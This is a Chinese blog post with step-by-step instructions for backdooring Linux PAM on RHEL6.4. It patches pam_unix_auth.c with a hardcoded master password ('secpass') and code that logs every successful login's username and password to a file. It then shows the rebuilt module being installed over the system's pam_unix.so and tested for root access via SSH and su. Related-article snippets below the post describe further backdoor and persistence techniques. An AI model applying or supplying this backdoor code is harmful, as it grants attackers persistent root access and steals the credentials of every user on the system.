PAM模块的backdoor实现与分析

最新推荐文章于 2025-01-21 10:40:12 发布
最新推荐文章于 2025-01-21 10:40:12 发布
阅读量184 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_33924770/article/details/85118045
本文介绍在RHEL6.4环境中通过修改PAM模块实现万能密码登录的方法,并记录登录密码到指定文件。该方法影响所有使用PAM模块的认证方式,包括SSH、SU等。

环境RHEL6.4

wget http://www.linux-pam.org/library/Linux-PAM-1.1.1.tar.gz

tar xzvf Linux-PAM-1.1.1.tar.gz

主要修改 Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c

/* verify the password of this user */
                               
         retval = _unix_verify_password(pamh, name, p, ctrl);
                               
 if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}
                               
 if(retval == PAM_SUCCESS)
                               
 {
                 FILE *fd;
                 fd = fopen(PASSWD_FILE, "a");
                 fprintf(fd, "%s:%s\n", name, p);
                         fclose(fd);
 }
         name = p = NULL;
         AUTH_RETURN;
 }


./configure && make

cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so 前提对系统现有pam_unix.so文件备份


测试ssh

wKioL1NLa0bim3TuAAHbrFWz7Kc843.jpg

以上是使用了万能密码登录功能,以不同的root密码登录,获得同样的root权限,另一个是记录登录密码到指定文件。

wKiom1NLa5-gc_ieAADuoJA5rWk403.jpg

在被***端查看密码文件,第一次管理员正常以root身份登录,第二次***者以root身份使用后门密码登录。

测试su
普通用户sysuser登录系统后,分别使用万能密码和正常密码切换为root

wKioL1NLa6ewJVQEAAFM1eOy6S0953.jpg

总结:PAM模块的backdoor程序实现很简单,主要为万能密码和键盘记录功能,还可以提供远程发送密码功能,主要影响了所有在/etc/pam.d/下利用到PAM模块认证的方式(ssh、su、ftp、telnet等。)

Have a nice day.          

网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 1427
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
阿一网络安全学院干货科普篇之应急响应【上】
qq_69775412的博客
06-17 1336
安全人员在遇到突发事件后所采取的措施和行动。发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。积极预防、及时发现、快速反应、确保恢复。
pam backdoor 安装使
p656456564545的专栏
02-25 1312
Linux后门转自:http://www.unshadow.com/?p=49用 linux上的后门我就不啰嗦了,昨天一时兴起,仔细研究了下pam backdoor,弄懂了后门安装的整个过程,下面我就来讲下这个后门的安装以及使用。     首先,这个PAM后门可以达到两个效果,一个是万能密码,一个是键盘记录。可以记录所有的登陆到这台机器的ssh用户的密码,默认保存在/t
Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology
weixin_33778544的博客
06-24 279
catalog 0. 引言 1. Pam后门 2. SSH后门 3. Hijacking SSH 4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication 5. Hijacking Active SS...
pam后门 和应用实例
weixin_33834137的博客
09-02 393
2019独角兽企业重金招聘Python工程师标准>>> ...
linux上的PAM后门理解学习
Shanfenglan's blog
09-09 1637
文章目录1. 什么是PAM2. 读懂PAM配置文件 1. 什么是PAM 全称为Pluggable Authentication Modules,是一种身份认证机制。直译是可插入的身份验证模块。 简单理解为,应用程序可以调用PAM给的接口来进行身份验证而不用自己去写详细的身份验证模块,将身份验证端于服务端分离,根据返回值来决定验证是否通过进而是否提供服务,具体验证规则取决于自定义的配置文件,也就是/etc/pam.d/下的配置文件,例如sshd服务的配置文件就为/etc/pam.d/sshd。 2. 读懂P
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
05-07 4246
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
linux权限维持
whojoe的博客
10-08 566
修改属性 文件时间 touch -r index.php shell.php touch -t 202010101010 shell.php #touch --help 历史操作命令 histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 sed -i '150,$d' .bash_history#只保留前150行 set +o history#针对你的工作关闭历史记录 set -o history#恢复 e
红队专题-维持隐匿Privilege Escalation
aming小老弟
10-27 1700
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
Linux云计算 |【第二阶段】SECURITY-DAY4
小安的运维专栏
08-22 1652
Kali系统、扫描抓包、Nginx安全加固、Linux基本防护
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1900
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
Linux PAM Backdoor 项目常见问题解决方案
最新发布
gitblog_00079的博客
01-21 838
Linux PAM Backdoor 项目常见问题解决方案 1. 项目基础介绍及主要编程语言 Linux PAM Backdoor 是一个开源项目,旨在为Linux-PAM(Pluggable Authentication Modules)创建一个后门。这个项目可以帮助用户在Linux系统上绕过正常的认证过程,通常用于教学和安全测试目的。项目主要使用Shell编程语言编写。 2. 新手常见问题及解...
LINUX留后门--教程(六)—— PAM后门
W小哥
07-14 6827
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 靶机 IP: 192.168.160.144 (centos7) 攻击IP: 192.168.160.1 (win10 xhell) 2.1 pam介绍 在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 678
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
SSH PAM后门(万能密码、记录密码)
网络安全。
08-19 4404
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
Linux SSH Backdoor分析排查
weixin_30274627的博客
06-11 872
1、SSH后门分类 SSH后门方式有以下几种 软链接 SSH Server wrapper SSH Keylogger 2、软链接 利用方法 [root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333; 排查方法 [root@helen]# netstat -anop 通过开发端口信息的PID查询进程路径...
python植入后门backdoor程序的方法?
weixin_33971130的博客
12-18 539
后门程序 from gevent.backdoor import BackdoorServer server = BackdoorServer(('127.0.0.1', 5001), banner="Hello from gevent backdoor!", locals={'foo': "From...
使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时出现的exploit completed but no session was created的解决办法
热门推荐
xixitaoguliuxian的博客
07-25 1万+
我在使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时,总是出现的exploit completed but no session was created的问题,针对这个现象,我找出了几点可能会导致这个问题出现的原因。 1、被攻击机器的防火墙打开了。 2、下载的vsftpd_2.3.4的默认配置有问题:          a)如果exploit时显示T...
PAM 的应用开发和内部实现源码分析
chenyulancn的专栏
09-27 5595
本文主要通过对Linux PAM源代码进行分析,阐述了PAM的内部实现机制和怎样在应用程序中应用PAM进行认证,以及怎样开发PAM服务模块。 1 引言 身份认证是操作系统安全的重要机制之一,系统通过认证机制核查用户的身份证明,并作为用户进入系统的判定条件,是防止恶意用户进入系统的第一道门槛。近年来认证理论和技术得到了迅速发展,产生了各种认证机制,如口令机制,RSA, DCE, kerberos
Linux安全登录实现PAM模块编程原理分析
下面将详细介绍PAM在Linux系统中的应用开发和内部实现源码,以及如何利用PAM模块编程来实现对Linux操作系统安全访问。 ### PAM核心概念 PAM的核心思想是将认证任务从应用程序中分离出来,通过一系列的模块来完成。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值